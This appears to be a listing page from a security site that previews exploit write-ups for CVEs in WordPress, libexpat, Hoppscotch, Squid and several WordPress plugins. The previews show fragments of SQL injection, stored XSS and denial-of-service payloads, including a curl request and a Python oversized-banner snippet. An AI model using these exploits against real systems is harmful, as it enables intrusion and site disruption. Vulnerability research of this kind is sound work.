Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub

CVE-2026-63030: wordpress-develop

## The Exploit An unauthenticated attacker can perform SQL injection via the `author__not_in` parameter in any REST API endpoint that passes user input to `WP_Query`. The following curl request demonstrates the injection against the default `/wp/v2/posts` endpoint. ```bash curl...

GitHub

CVE-2026-63030: wordpress-develop

## The Exploit An unauthenticated attacker can perform SQL injection via the `author__not_in` parameter in any REST API endpoint that passes user input to `WP_Query`. The following curl request demonstrates the injection against the defaul...

Read article →
GitHub

CVE-2026-60137: wordpress-develop

## The Exploit The attacker does not require authentication; the vulnerability is exploitable from an unauthenticated state as long as the target site exposes a `WP_Query` instance through a publicly accessible endpoint that accepts the `a...

Read article →
GitHub

CVE-2026-50219: libexpat

## The Exploit The attacker needs to be able to deliver a crafted XML document to an XML parser that uses the libexpat library (version < 2.8.2). No authentication is required if the parser is exposed publicly; in the worst case, the attac...

Read article →
GitHub

CVE-2026-50160: hoppscotch-backend

## The Exploit Attacker needs a valid Hoppscotch self-hosted session with access to the collection sync API. ```bash curl -i -X POST "https://TARGET/graphql" \ -H "Content-Type: application/json" \ -H "Cookie: session=YOUR_SESSION_COO...

Read article →
GitHub

CVE-2026-47729: squid-cache-squid

## The Exploit Attacker needs control of the upstream FTP server that the Squid FTP client/gateway is connecting to. ```python #!/usr/bin/env python3 import socket payload = b'220 ' + b'A' * 25000000 + b'\r\n' with socket.socket(socket....

Read article →
GitHub

CVE-2024-2782: fluentform

## The Exploit An unauthenticated attacker can modify any global setting in the Fluent Forms plugin by sending a POST request to the REST API endpoint with no authentication token, credential, or capability check. ```http POST /wp-json/fl...

Read article →
GitHub

CVE-2024-10646: fluentform

## The Exploit An unauthenticated attacker can inject arbitrary JavaScript into a form's subject field that will execute in the browser of any user who accesses the published form. ```http POST /wp-json/fluent-form/v1/forms HTTP/1.1 Host:...

Read article →
GitHub

CVE-2026-4803: royal-elementor-addons

## The Exploit An unauthenticated attacker can inject arbitrary JavaScript that persists in the database and executes whenever any user visits the affected page, because the `wpr_update_form_action_meta` AJAX handler accepts a publicly kno...

Read article →
GitHub

CVE-2024-1207: booking

## The Exploit An unauthenticated attacker can inject arbitrary SQL into the WP Booking Calendar booking form by supplying a malformed CSV date string in the `calendar_request_params[dates_ddmmyy_csv]` parameter. Below is a live HTTP reque...

Read article →